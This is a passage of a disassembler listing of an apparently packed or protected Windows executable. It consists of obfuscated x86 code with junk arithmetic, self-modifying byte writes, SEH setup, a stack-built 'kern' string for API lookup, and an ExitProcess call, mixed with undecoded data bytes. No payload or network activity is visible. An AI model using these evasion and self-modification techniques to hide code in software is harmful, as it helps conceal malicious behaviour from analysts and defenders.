		dd 5EC68B24h, 73C8C881h, 6AE9C3C9h, 0FFFFE5h, 59F98B00h
		dd 0FC63C281h, 0B7682A89h, 0E900488Ah, 1A84h
		db 0
; ---------------------------------------------------------------------------

loc_48B9B1:				; CODE XREF: _3gijy9nr:0048D493j
		or	esi, 0ACA959FCh
		call	near ptr dword_489CC8+2Fh
		add	cl, ch
		xchg	eax, ecx
		sar	edi, cl
		inc	dword ptr [ecx-508A5719h]
		adc	ch, cl
; ---------------------------------------------------------------------------
		db 8Dh,	0F2h, 0FFh
		dd 870000FFh, 685E2434h, 0ADD482B3h, 6BC08158h,	0E9ECB805h
		dd 0FFFFF934h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B9E6:				; CODE XREF: sub_48B609-617j
		push	eax
		push	2E774760h
		pop	eax
		sub	eax, 29CDAF8Ch
		xor	eax, 8E6B8A9Dh
		and	eax, 0F7F167F1h
		jmp	loc_48D986
; ---------------------------------------------------------------------------

locret_48BA04:				; CODE XREF: sub_48A8B8:loc_48C57Ej
		retn
; ---------------------------------------------------------------------------
		align 2

loc_48BA06:				; CODE XREF: sub_48DA9F+Dj
		jmp	loc_48CE4D
; ---------------------------------------------------------------------------
		align 4
		dd 89E9C300h, 0FFFFFE1h, 6AE89h
		db 0
; ---------------------------------------------------------------------------

loc_48BA19:				; CODE XREF: sub_48B609+E53j
		jmp	loc_48DC5F
; ---------------------------------------------------------------------------
		ror	ecx, 0Bh
		xor	eax, esi
		popf
		mov	ebx, [esi]
		jmp	loc_48C0C1
; ---------------------------------------------------------------------------
		db 0C1h
		dd 148716EFh, 7C65A24h,	241C87C3h, 0FFFA86E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48BA3F:				; CODE XREF: sub_48B609:loc_48D7B2j
		test	esi, edi
		pop	edi
		jmp	loc_48DCFD
; ---------------------------------------------------------------------------
		align 4
		dd 59F18B00h, 3693C681h, 0EE817C23h, 0B5D54F69h, 0FFDB54E9h
		dd 0F73B00FFh, 0FFCF94E9h, 0F0000FFh, 0FFE6CE8Ah, 1500E9FFh
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48BA73:				; CODE XREF: _3gijy9nr:0048A013j
		mov	ebp, esp
		push	489670h
		jmp	nullsub_581
; ---------------------------------------------------------------------------
		align 10h

loc_48BA80:				; CODE XREF: sub_4896F0:loc_48AC1Fj
		jnz	loc_48B173
		jmp	loc_48CC24
; ---------------------------------------------------------------------------
		align 4

locret_48BA8C:				; CODE XREF: sub_48CE8D-1892j
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 1B59h, 4CE90000h, 24h, 0FFFE84E9h, 505F00FFh, 48D9A3B8h
		dd 0DC19E900h, 8100FFFFh, 0A9163FF6h, 1C6F711h,	0E9000000h
		dd 1A1Eh, 0E917E6C1h, 4D3h, 9D58689Ch, 0B9E90048h, 0Fh
		dd 0A2E95BC3h
		db 0EFh, 2 dup(0FFh)
; ---------------------------------------------------------------------------

locret_48BADB:				; CODE XREF: _3gijy9nr:loc_48DCEAj
		retn
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48BADD:				; CODE XREF: _3gijy9nr:004897C1j
		jmp	loc_48DBD1
; ---------------------------------------------------------------------------
		dw 0C300h
		dd 0FFFF2AE9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

locret_48BAEA:				; CODE XREF: sub_48B609:loc_48D976j
		retn
; ---------------------------------------------------------------------------
		align 4

loc_48BAEC:				; CODE XREF: sub_48D704-2A5Ej
		jmp	loc_48C29A
; ---------------------------------------------------------------------------
		align 2
		dw 0E1E9h
		dd 0FFFFDAh
		db 0
; ---------------------------------------------------------------------------

loc_48BAF9:				; DATA XREF: sub_48B609:loc_48B7EAo
		mov	byte ptr [ecx],	87h
		pop	ecx
		push	9C13E2D5h
		pop	eax
		jmp	loc_48C815
; ---------------------------------------------------------------------------
		dd 0F5E9C300h, 17h, 9C8A0F00h, 85FFFFEAh, 0EC92E9D8h, 0FFFFh
					; CODE XREF: sub_48DAB9+8j
		dd 0F71DC6C1h, 40000C6h, 0E01CE900h, 0E081FFFFh, 0B69A680Dh
		dd 48969868h, 6F6E900h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48BB3E:				; CODE XREF: sub_48B609-1CBEj
		mov	byte ptr [edi],	85h
		xchg	ebx, [esp+0]
		mov	edi, ebx
		pop	ebx

loc_48BB47:				; CODE XREF: _3gijy9nr:00489D2Cj
		add	ecx, 0DAC74FFDh
		rol	ecx, 12h
		or	ecx, 662BDDFDh
		jmp	loc_48B8DE
; ---------------------------------------------------------------------------

loc_48BB5B:				; CODE XREF: _3gijy9nr:loc_48C20Ej
		push	9D07E11Ah
		pop	ecx
		xor	ecx, 394414A4h
		add	ecx, 5C04BB36h
		call	near ptr dword_48B0E4+1
; ---------------------------------------------------------------------------
		db    0
		db    0
		db  81h	; 
		db 0C1h	; Á
		db 0ABh	; «
		db    5
		db  1Bh
		db  68h	; h
		db 0C1h	; Á
		db 0C1h	; Á
		db  0Bh
		db  81h	; 
		db 0F1h	; ñ
		db  76h	; v
		db  7Ah	; z
		db  24h	; $
		db  7Ah	; z
		db    3
		db 0F9h	; ù
		db  59h	; Y
		db 0E9h	; é
		db 0B7h	; ·
		db  12h
		db    0
		db    0
		db    0
		db 0C1h	; Á
		db 0C9h	; É
		db    6
		db  33h	; 3
		db 0C1h	; Á
		db 0E9h	; é
		db 0B8h	; ¸
		db  13h
		db    0
		db    0
		db 0C3h	; Ã
		db    0
		db 0BBh	; »
		db  2Dh	; -
		db 0CFh	; Ï
		db  48h	; H
		db    0
		db 0E9h	; é
		db  56h	; V
		db  0Ch
		db    0
		db    0
		db    0
		db    0
; ---------------------------------------------------------------------------
		sub	edx, 787EBD56h
		ror	eax, 13h
		jmp	near ptr sub_48A289
; ---------------------------------------------------------------------------

loc_48BBB2:				; CODE XREF: _3gijy9nr:00488F53j
		jns	loc_48B166
		jp	loc_48A68A
		jmp	sub_48C67D
; ---------------------------------------------------------------------------

loc_48BBC3:				; DATA XREF: sub_48B609:loc_48B627o
		or	eax, eax
		jnz	locret_48BBD0
		jmp	loc_489F75
; ---------------------------------------------------------------------------

locret_48BBD0:				; CODE XREF: sub_48B609+5BCj
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0), 68h
		dd offset dword_4891B8+11h
; ---------------------------------------------------------------------------
		jmp	loc_48C215
; ---------------------------------------------------------------------------
		align 2
		jbe	sub_489A21
		jmp	loc_48D0B6
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48BBEB:				; CODE XREF: _3gijy9nr:0048C417j
		xor	ecx, 6F181387h
		or	ecx, 5428BA95h
		and	ecx, 0E0E9AB7Bh
		add	ecx, 3FE02AD3h
		call	sub_48D620

loc_48BC08:				; CODE XREF: _3gijy9nr:0048CEADj
		jmp	loc_488B12
; ---------------------------------------------------------------------------

loc_48BC0D:				; CODE XREF: _3gijy9nr:0048A921j
		cmp	ebp, esi
		jmp	near ptr dword_488B2C+59h
; ---------------------------------------------------------------------------
		ror	edx, 12h
		jmp	loc_48CB43
; ---------------------------------------------------------------------------
		dd 0D9130000h, 81DDF581h, 74E9D629h, 0C6000011h, 8B689D02h
		dd 0E90048A4h, 0FFFFD0ABh
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48BC3A:				; CODE XREF: _3gijy9nr:0048969Ej
		call	sub_488888
		call	sub_48D36D
; ---------------------------------------------------------------------------
		dd 0F4E90000h, 0
		db 0
; ---------------------------------------------------------------------------

loc_48BC4D:				; CODE XREF: sub_48B609+6E1j
		xor	eax, 0C2668A10h
		push	489337h
		jmp	near ptr dword_4888A0+80h
; ---------------------------------------------------------------------------
		db 0Fh,	82h, 80h
		dd 68FFFFFEh, 0E9A555D2h, 0D6AE9h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48BC6F:				; CODE XREF: sub_488888+Ep
		xchg	esi, [esp+8+var_8]
		pop	esi
		add	eax, 1043FF32h
		push	eax

loc_48BC7A:				; DATA XREF: _3gijy9nr:00489699o
		fsubp	st(1), st
		fcmovu	st, st(7)
; ---------------------------------------------------------------------------
		dw 0FFFFh
		dd 850F0000h, 1E8Eh, 0FFD261E9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48BC8D:				; CODE XREF: sub_48B609:loc_489FB2j
					; DATA XREF: _3gijy9nr:0048AE1Eo
		sub	al, 99h
		push	488977h
		jmp	loc_48BE56
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48BC9B:				; CODE XREF: sub_48B609+8BBj
		mov	edx, 489C47h
		jmp	loc_48B8B1
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C3h
; ---------------------------------------------------------------------------

loc_48BCA8:				; CODE XREF: sub_48B609+247Cj
		jmp	loc_48AE9D
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48BCAF:				; CODE XREF: sub_48B609+224Ej
		jmp	loc_48DEC5
; ---------------------------------------------------------------------------
		dd 0F3E90000h, 1Bh
		db 0
; ---------------------------------------------------------------------------

loc_48BCBD:				; CODE XREF: _3gijy9nr:loc_48CE48j
		mov	ebx, offset loc_48A33B
		jmp	loc_48C27D
; ---------------------------------------------------------------------------
		align 4
		dd 0C300h, 0FCE99Ch, 0
; ---------------------------------------------------------------------------

loc_48BCD4:				; CODE XREF: _3gijy9nr:0048A8C8j
		pop	ebx
		jge	sub_48D530
		push	0AD95897Dh
		pop	eax
		add	eax, 1D7410ACh
		rol	eax, 6
		jmp	loc_48BC4D
; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------

loc_48BCF1:				; CODE XREF: _3gijy9nr:0048B39Cj
		mov	edx, [edx]
		popf
		xchg	edx, [esp+4+var_4]
		push	488C69h
		jmp	near ptr dword_488E8C+15h
; ---------------------------------------------------------------------------
		db 2 dup(0), 87h
		dd 487240Ch, 58C88B24h,	0FFFFA5E9h, 8B03C6FFh, 9950685Bh
		dd 0EFE90048h, 0BFFFFFCh, 5E8B0FCAh, 0E9000001h, 1880h
		dd 0E8128B00h, 106Bh, 0B4BEFCB8h, 0FA27E943h, 0C300FFFFh
		dd 0FFD2A7E9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48BD45:				; CODE XREF: sub_48ADE6:loc_488864j
		push	offset byte_48D1B1
		jmp	nullsub_543
; ---------------------------------------------------------------------------
		align 10h
		dd 0B2BA5200h, 0E90048C8h, 0FFFFF0EEh, 55E80000h, 13h
; ---------------------------------------------------------------------------

loc_48BD64:				; CODE XREF: sub_48ADD6+2D69j
		jmp	nullsub_556
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0FFFFD542h
; ---------------------------------------------------------------------------

loc_48BD70:				; CODE XREF: sub_48B609:loc_488DA3j
		push	offset byte_48A6FD
		jmp	nullsub_544
; ---------------------------------------------------------------------------
		adc	eax, 0D3B04E8Ch

loc_48BD80:				; CODE XREF: _3gijy9nr:004896EAj
		jmp	sub_48B429
; ---------------------------------------------------------------------------
		db 68h,	5Eh, 0BDh
		dd 815F1475h, 0D45606F7h, 89850F65h, 6
		db 0
; ---------------------------------------------------------------------------

loc_48BD99:				; CODE XREF: sub_48D95C-694j
		jmp	loc_48DBF9
; ---------------------------------------------------------------------------
		dw 0F00h
		dd 0FFF09D84h, 92D981FFh, 0E9F05144h, 66Eh, 34870000h
		dd 8B575E24h, 243C87FBh, 488A8DBBh, 1803E900h, 0E9990000h
		dd 0FFFFCAD6h, 1C870000h, 243C8724h, 815FDF8Bh,	1D1F60C6h
		dd 50F5034Fh, 1259E9h
		db 3 dup(0)
; ---------------------------------------------------------------------------

locret_48BDE7:				; CODE XREF: sub_48B5AE:loc_48B085j
		retn
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

locret_48BDE9:				; CODE XREF: sub_48D1F6-4D8j
		retn
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48BDEB:				; CODE XREF: sub_48D2DE-3677j
		jmp	nullsub_576
; ---------------------------------------------------------------------------
		dd 77680000h, 0E98FB2C4h, 0FFFFFC2Fh, 0C7F70000h, 93819E4Dh
		dd 0FFD080E9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

loc_48BE0A:				; CODE XREF: _3gijy9nr:loc_48D10Cp
		xchg	ebx, [esp+8+var_8]
		pop	ebx
		xchg	esi, [esp+4+var_4]
		xchg	eax, [esp+4+var_4]
		jmp	near ptr dword_48B1A4+2
; ---------------------------------------------------------------------------
		db 68h,	88h, 9Bh
		dd 32E90048h, 0FFFFD7h,	3358C1F7h, 0AEE9A568h
		db 0EEh, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48BE2F:				; CODE XREF: sub_48A1A5+Bj
		and	edx, 466B932Ch
		or	edx, 0E37AC0BDh
		rol	edx, 1Bh
		sub	edx, 0EE83D5CEh
		add	edx, 3482BCA8h
		add	edx, ebp
		jmp	loc_48C532
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48BE53:				; CODE XREF: _3gijy9nr:0048B1B2j
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48BE56:				; CODE XREF: sub_48B609+68Bj
		jmp	near ptr dword_48893C+34h
; ---------------------------------------------------------------------------
		rol	eax, 0Fh
		or	eax, 0D2DE2C87h
		xor	eax, 0B4B4990Dh
		add	eax, 0B1DE18CEh
		xchg	eax, [esp+0Ch+var_C]
		jmp	locret_48B8B7
; ---------------------------------------------------------------------------
		dd 0F3236F68h, 1BE9585Ch, 0FFFFE7h
		db 0
; ---------------------------------------------------------------------------

loc_48BE85:				; CODE XREF: sub_48B609-13A9j
		sub	edx, ebx

loc_48BE87:				; CODE XREF: _3gijy9nr:0048C84Aj
		xor	eax, 3220A6FAh
		call	sub_48C090
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48BE93:				; CODE XREF: _3gijy9nr:00489A3Dj
		jmp	loc_48A6E8
; ---------------------------------------------------------------------------
		dd 0FFE4E0E9h, 8A0F00FFh, 0FFFFDE9Dh, 10C8C15Dh, 1750E9h
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48BEAE:				; CODE XREF: sub_48A83A+Dj
		retn
; ---------------------------------------------------------------------------

loc_48BEAF:				; DATA XREF: _3gijy9nr:0048AD7Ao
		add	esp, 4
		retn
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------

loc_48BEB5:				; CODE XREF: _3gijy9nr:0048B4DEj
		push	large dword ptr	fs:0
		mov	large fs:0, esp
		push	edx
		jmp	loc_48BC9B
; ---------------------------------------------------------------------------
		align 2

locret_48BECA:				; CODE XREF: sub_48C7C0:loc_48B501j
		retn
; ---------------------------------------------------------------------------

loc_48BECB:				; CODE XREF: _3gijy9nr:00488A99j
		jmp	loc_48DD98
; ---------------------------------------------------------------------------

loc_48BED0:				; CODE XREF: sub_48B609+C0j
					; DATA XREF: _3gijy9nr:0048B25Fo
		mov	dword ptr [ebp-18h], 6E72656Bh
		push	48AB6Dh
		jmp	near ptr dword_488E8C+57h
; ---------------------------------------------------------------------------
		align 2
		dw 4968h
		dd 0E90048B4h, 0FFFFFA44h
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48BEEF:				; CODE XREF: sub_48B609-1138j
		jmp	near ptr dword_489124+83h
; ---------------------------------------------------------------------------
		dd 16680000h, 5B447B71h, 814BF381h, 6853B7AAh, 0E41729Dh
		dd 47C3815Bh, 0E90D3FA7h, 0F0Fh, 0F7680000h, 0E90048B8h
		dd 38Ah
; ---------------------------------------------------------------------------

loc_48BF20:				; CODE XREF: sub_48B609-481j
		add	eax, 42A0CE5Ah
		xor	eax, 571F1B01h
		jmp	loc_489EF8
; ---------------------------------------------------------------------------
		align 2

loc_48BF32:				; CODE XREF: _3gijy9nr:loc_489932j
		jno	loc_48A1F0
		push	ecx
		push	0A356F991h
		pop	ecx
		sub	ecx, 24E6E695h
		jmp	loc_48B8EB
; ---------------------------------------------------------------------------
		align 4
		dd 0EEE9D82Bh, 0FFFFE3h, 0E8992C00h, 11D5h, 64685E00h
		dd 5A3490A6h, 3A76E281h, 9EE9A882h, 0FFFFF2h, 7CDC1C3h
		dd 0FFEE48E9h, 0F70000FFh, 241487D5h, 3C879D5Ah, 0E58AE924h
		dd 0FFFFh, 68FC75FFh, 48C584h, 15DFE9h,	87000000h, 3C872434h
		dd 5FF78B24h, 0FFD1ACE9h
		db 0FFh
; ---------------------------------------------------------------------------

locret_48BFA9:				; CODE XREF: sub_48B609:loc_48C50Dj
		retn
; ---------------------------------------------------------------------------
		dw 6800h
; ---------------------------------------------------------------------------
		test	eax, 5AB8426Bh
		and	edx, 0DE4E630Bh
		xor	edx, 0BA532C77h
		jns	loc_48D254

loc_48BFC3:				; CODE XREF: _3gijy9nr:0048C74Ej
		jmp	loc_489AC7
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48BFCA:				; CODE XREF: sub_48B609-1BC1j
		jmp	nullsub_555
; ---------------------------------------------------------------------------
		sbb	ecx, 758E5C86h
		jmp	loc_48DF8C
; ---------------------------------------------------------------------------
		align 4
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48BFDF:				; CODE XREF: sub_48C7B1+8j
		jmp	loc_48A228
; ---------------------------------------------------------------------------

loc_48BFE4:				; CODE XREF: _3gijy9nr:0048A1DBp
		xchg	edx, [esp+0]
		xchg	esi, [esp+0]
		mov	edx, esi
		pop	esi
		xchg	edx, [esp+0]
		jmp	loc_48D551
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E8h
		dd 0FFFFD294h, 1E90000h, 0FFFFD4h, 7ABB5900h, 0E968EF6Dh
		dd 16F4h
dword_48C010	dd 598B01C6h, 87FB8B57h, 79E9243Ch, 0FFFFFBh, 0C3636800h
					; DATA XREF: _3gijy9nr:0048A362o
		dd 5E9016Ch, 0C3000015h, 810F0000h, 0BA1h, 28E93B87h, 7
		db 0
; ---------------------------------------------------------------------------

locret_48C03D:				; CODE XREF: _3gijy9nr:0048978Fj
		retn
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48C03F:				; CODE XREF: sub_48B609+Dj
		jmp	nullsub_545
sub_48B609	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 890F0000h, 0FFFFF526h, 0FFDB0FE9h
		db 0FFh, 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_575. PRESS KEYPAD	"+" TO EXPAND]
		dd 0FD8B9D00h, 0A41E9h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48C05E:				; DATA XREF: _3gijy9nr:0048953Fo
		xchg	edi, [esp]
		pop	edi
		push	edx
		mov	edx, ecx
		xchg	edx, [esp]
		pushf
		jmp	loc_48C20E
; ---------------------------------------------------------------------------
		dw 0F00h
		dd 19C78Dh, 0E9D7F700h,	0FFFFE28Ch, 53241C87h, 0C35B5Dh
; ---------------------------------------------------------------------------

loc_48C084:				; CODE XREF: _3gijy9nr:loc_48B33Bj
		push	1E29FA4Bh
		push	esi
		jmp	loc_48DF4E
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_48C090	proc near		; CODE XREF: sub_48B609+884p

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0048D9E0 SIZE 0000001D BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	edi
		pushf
		push	63485679h
		xchg	ebp, [esp+8+var_8]
		mov	edi, ebp
		pop	ebp
		jmp	loc_48D9E0
sub_48C090	endp

; ---------------------------------------------------------------------------
		align 4
		dd 0C781FD03h, 662290Fh, 0FFF11FE8h, 0D6AEE9FFh, 0F3E9FFFFh
		dd 0FFFFDAh
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C0C1:				; CODE XREF: sub_48B609+41Dj
		jle	loc_48B746
		xor	esi, 6B20C418h
		add	esi, ebp
		push	ebx
		push	3D26F545h
		pop	ebx
		and	ebx, 144110F6h
		add	ebx, 93037836h
		jmp	near ptr dword_4891B8+37h
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		dd 3C60000h, 0C3595BC3h, 0
		dd offset sub_48E128
; ---------------------------------------------------------------------------

loc_48C0F8:				; CODE XREF: _3gijy9nr:0048B3D6j
		jmp	near ptr dword_48A380+0Eh
; ---------------------------------------------------------------------------
		db 2 dup(0), 68h
		dd 7EA3F9BDh, 80FE9h, 87C21B00h, 815A2414h, 0B4458C2h
		dd 0FC13E9E1h, 0FFFFh, 0E90BEFC1h, 0FFFFCF09h, 58F64h
		dd 68000000h, 48B72Ch, 0FFDF27E9h, 0B90000FFh, 48A779h
		dd 1E36E9h, 88F88100h, 0E970BA94h, 1AE1h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C14C:				; CODE XREF: sub_48B609:loc_488E71j
		mov	ecx, ebp
		xchg	ecx, [esp+4+var_4]
		push	offset word_48A9A2
		jmp	nullsub_571
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		dd 68E0F00h, 81FFFFD0h,	49A917C6h, 0C96BE914h, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C170:				; CODE XREF: sub_48B609-1412j
		mov	edi, offset byte_48CD81
		jmp	loc_48D848
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4

loc_48C17C:				; CODE XREF: _3gijy9nr:0048993Ej
		push	esi
		mov	esi, ebx
		xchg	esi, [esp]
		push	2B198EADh
		pop	ebx
		push	esi
		mov	esi, offset loc_48DD52
		jmp	loc_489AA2
; ---------------------------------------------------------------------------
		align 4
		dd 0C300h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C198:				; CODE XREF: sub_48B609:loc_48ABF4j
		pop	edi
		jmp	loc_48DE75
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C19F:				; CODE XREF: sub_48B609-13C5j
		jmp	loc_48D8FB
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dd 0FFFA2AE8h, 0EB8B55FFh, 68242C87h, 9A22A5B6h, 0F1EB815Bh
		dd 0E9BD8A29h, 0FFFFE435h
		db 2 dup(0)
word_48C1C2	dw 15FFh		; DATA XREF: sub_48D36D-4A4o
		dd offset dword_45D0C0
		dd 96FB6851h, 0D4E90048h, 0FFFFFAh, 6804C483h, 616F78FFh
		dd 4FE88158h, 814D9835h, 8D2D73E0h, 2FC88144h, 0E9684BB9h
		dd 0FFFFC9D7h, 0BDC1F700h, 0E93F4877h, 0FFFFED6Eh, 0DBF28100h
		dd 0FE11E9Dh, 0FFCF3685h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

loc_48C20E:				; CODE XREF: _3gijy9nr:0048C069j
		jmp	loc_48BB5B
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C215:				; CODE XREF: sub_48B609+5CFj
		jmp	nullsub_588
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		cmp	eax, 0C27852C0h
		jmp	loc_48CD23
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------

loc_48C229:				; CODE XREF: _3gijy9nr:0048C9C9j
		add	ebx, 6D98EB6Dh
		call	sub_48AE28
		jmp	locret_48A5E6
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C23A:				; CODE XREF: sub_48B609-1BAj
		mov	byte ptr [edx],	87h
		pop	edx
		sub	edx, 8CBAA7C0h
		or	edx, 23107597h
		js	loc_48AF94
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48C251:				; CODE XREF: _3gijy9nr:0048C80Dj
		adc	edx, 0DDE340FCh
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C257:				; CODE XREF: sub_48B609:loc_489FACj
		and	edi, 7ABA023Fh
		sub	edi, 0B5B92C10h
		xor	edi, 5E70D5F5h
		test	esi, edi
		jmp	loc_48ABF4
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dd 62680000h, 0E849667Dh, 133Ah
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C27D:				; CODE XREF: sub_48B609+6B9j
		jmp	loc_48CC63
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		call	ds:dword_45D0C0	; ExitProcess
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		mov	eax, offset loc_48C2BC
		jmp	loc_48D146
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C29A:				; CODE XREF: sub_48B609:loc_48BAECj
		mov	byte ptr [ecx],	0C3h
		pop	ecx
		xchg	eax, [esp+0]
		mov	ebp, eax
		jmp	loc_48DC87
; END OF FUNCTION CHUNK	FOR sub_48B609
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_549. PRESS KEYPAD	"+" TO EXPAND]
		align 2
		dw 52E9h
		db 0C9h, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48C2AF:				; CODE XREF: _3gijy9nr:004893BDj
		add	esi, ebp
		add	esi, 0E3C6EB78h
		mov	esi, [esi]
		xchg	esi, [esp]

loc_48C2BC:				; DATA XREF: _3gijy9nr:0048C290o
		pop	ss
		adc	eax, offset dword_45D0C0
		jmp	loc_48A0ED
; ---------------------------------------------------------------------------
		align 4
		dd 0C5685300h, 5BD3011Ah, 5726CB81h, 0EB81FA16h, 0E7ACB937h
		dd 0FFE2D2E9h, 870000FFh, 0C9C2E90Ah, 0FFFFh, 5F243C87h
		dd 599D01C6h, 48D12468h, 0CF0EE900h, 0FFFFh, 62E9D533h
		dd 0FFFFC7h, 840F5E00h,	0FFFFD622h, 0E560CD68h,	241C875Eh
		dd 0E95BC38Bh, 145Dh, 0C30000h,	0C7E8E900h, 0FFFFh, 8B240C87h
		dd 0CF8159F9h, 0F7AF6926h, 0FFE034E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48C33F:				; CODE XREF: _3gijy9nr:0048A0E6j
		pop	ebx
		and	ebx, 0D5EB2966h
		add	ebx, 0B027A2C0h
		jmp	loc_48C702
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C6h
		dd 81599D01h, 0FA4259C3h, 871B8BF4h, 8AE9241Ch,	17h, 0F7DE1B00h
		dd 0C58BE9D3h, 5F68FFFFh, 0E90048D0h, 0FFFFF336h, 0C300h
		dd 5E243487h, 0C6E1B951h, 1E90048h, 8100000Ah, 0FAA0CCC9h
		dd 0F212E9D5h, 0F700FFFFh, 3CBC1D3h, 0FFFA65E9h, 0F70000FFh
		dd 3CBA44C2h, 0E473E9EBh, 0FFFFh

; =============== S U B	R O U T	I N E =======================================



sub_48C3B4	proc near		; CODE XREF: _3gijy9nr:00489D7Fj
					; _3gijy9nr:0048B0F9p

; FUNCTION CHUNK AT 0048CCE6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D063 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		jns	near ptr dword_488DA8+8
		jz	loc_48CCE6
		push	489C7Eh
		jmp	loc_48D063
sub_48C3B4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 330h, 0E9D71300h, 0FFFFE224h, 0E5850F58h, 0E9FFFFECh
		dd 8EAh
		db 0
byte_48C3ED	db 9Ch,	51h, 8Bh	; DATA XREF: _3gijy9nr:0048975Eo
		dd 240C87CEh, 8498DA68h, 0C6D15ED3h, 0FFF4AAE9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48C401:				; DATA XREF: _3gijy9nr:0048A790o
		mov	byte ptr [edx],	8Dh
		xchg	eax, [esp]
		mov	edx, eax
		pop	eax

loc_48C40A:				; CODE XREF: _3gijy9nr:0048A825j
		push	ecx
		push	5A23ED7Eh
		pop	ecx
		add	ecx, 9642EACAh
		jmp	loc_48BBEB
; ---------------------------------------------------------------------------
		dd 3B890000h, 0AA65C781h, 569D8EA6h
; ---------------------------------------------------------------------------
		cmp	al, 24h

loc_48C42A:				; CODE XREF: _3gijy9nr:0048A0D3j
		jmp	loc_48CDAE
; ---------------------------------------------------------------------------
		db 81h
		dd 0D83074E2h, 0EC16E914h, 8100FFFFh, 4AE6B2E9h, 2414870Fh
		dd 0A2E9535Ah, 0FFFFD8h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C44C:				; CODE XREF: sub_48B609:loc_48CD4Ej
		push	eax
		pop	edx
		xchg	edx, [esp+0]
		push	ebx
		push	68F62A42h
		xchg	esi, [esp+4Ch+var_4C]
		mov	ebx, esi
		jmp	loc_48BA19
